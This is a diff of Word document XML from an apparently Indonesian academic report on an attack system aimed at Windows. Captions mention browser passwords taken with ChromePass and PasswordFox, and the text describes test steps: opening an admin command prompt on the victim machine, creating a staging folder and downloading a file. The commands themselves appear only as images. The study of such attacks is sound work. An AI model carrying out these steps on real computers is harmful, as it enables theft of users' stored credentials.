         <w:t xml:space="preserve"> yang Diambil oleh ChromePass</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="104"/>
       <w:bookmarkEnd w:id="105"/>
       <w:bookmarkEnd w:id="106"/>
-      <w:bookmarkEnd w:id="107"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -29247,9 +30861,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="108" w:name="_Toc43087617"/>
-      <w:bookmarkStart w:id="109" w:name="_Toc43087911"/>
-      <w:bookmarkStart w:id="110" w:name="_Toc43087991"/>
+      <w:bookmarkStart w:id="107" w:name="_Toc43087617"/>
+      <w:bookmarkStart w:id="108" w:name="_Toc43087911"/>
+      <w:bookmarkStart w:id="109" w:name="_Toc43194847"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -29301,9 +30915,9 @@
         </w:rPr>
         <w:t>. Username dan Password yang Diambil oleh PasswordFox</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="107"/>
       <w:bookmarkEnd w:id="108"/>
       <w:bookmarkEnd w:id="109"/>
-      <w:bookmarkEnd w:id="110"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -30808,9 +32422,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="111" w:name="_Toc43087618"/>
-      <w:bookmarkStart w:id="112" w:name="_Toc43087912"/>
-      <w:bookmarkStart w:id="113" w:name="_Toc43087992"/>
+      <w:bookmarkStart w:id="110" w:name="_Toc43087618"/>
+      <w:bookmarkStart w:id="111" w:name="_Toc43087912"/>
+      <w:bookmarkStart w:id="112" w:name="_Toc43194848"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -30872,9 +32486,9 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="110"/>
       <w:bookmarkEnd w:id="111"/>
       <w:bookmarkEnd w:id="112"/>
-      <w:bookmarkEnd w:id="113"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -30917,45 +32531,4523 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="114" w:name="_Toc43087425"/>
+      <w:bookmarkStart w:id="113" w:name="_Toc43087425"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>PENGUJIAN SISTEM DAN ANALISIS</w:t>
+        <w:t>Pengujian Sistem Dan Analisis</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="113"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pengujian Sistem</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada bagian ini akan dijelaskan mengenai pengujian pada sistem penyerangan yang telah dirancang sebelumnya, cakupan dari pengujian yang dilakukan ini </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>adalah</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>seluruh proses penyerangan. Tujuan dari dilakukannya pengujian ini adalah untuk mengetahui tingkat keberhasilan dari sistem penyerangan yang dirancang serta mengetahui kelebihan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>, kekurangan serta dampak yang ditimbulkan pada sistem operasi Windows.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:hanging="737"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pengujian </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Membuat Folder Baru</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pada penyerangan ini langkah pertama yang dilakukan adalah dengan membuat foder baru pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file explorer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> direktori C: komputer korban, namun sebelum itu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">membuka </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Command Prompt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (CMD) sebagai admin. Gambar V-1 menunjukkan perintah untuk melakukan hal tersebut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="452A490F" wp14:editId="0241A197">
+            <wp:extent cx="3848100" cy="2009775"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="31" name="Picture 31"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3848100" cy="2009775"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="114" w:name="_Toc43194852"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Membuka CMD Sebagai Admin</w:t>
       </w:r>
       <w:bookmarkEnd w:id="114"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
         <w:jc w:val="center"/>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F9E6337" wp14:editId="42FFE07B">
+            <wp:extent cx="4587902" cy="2420526"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="32" name="Picture 32"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4599256" cy="2426516"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="288"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="115" w:name="_Toc43194853"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Masuk ke dalam CMD Sebagai Admin</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="115"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="288"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="288"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">V-2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>menunjukkan bahwa percobaan untuk membuat folder pada komputer target dapa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>t dilanjutkan karena sudah berhasil</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> masuk kedalam CMD sebagai admin, Gambar V-3 menunjukkan baris perintah untuk membuat folder sekaligus pindah kedalam folder tersebut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="289"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C06C96" wp14:editId="6C38DF6D">
+            <wp:extent cx="4572000" cy="2396009"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="33" name="Picture 33"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4680149" cy="2452686"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="431"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="116" w:name="_Toc43194854"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Perintah Membuat Folder</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Baru</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="116"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Gambar V-4 berikut ini menampilkan bahwa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> folder baru berhasil dibuat untuk digunakan sebagai penyimpanan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sementara selama berlangsungnya penyerangan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E0A7BC" wp14:editId="13673C14">
+            <wp:extent cx="4579952" cy="3110421"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="34" name="Picture 34"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4605746" cy="3127939"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="117" w:name="_Toc43194855"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Folder Baru Berhasil Dibuat</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="117"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pengujian Mengunduh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
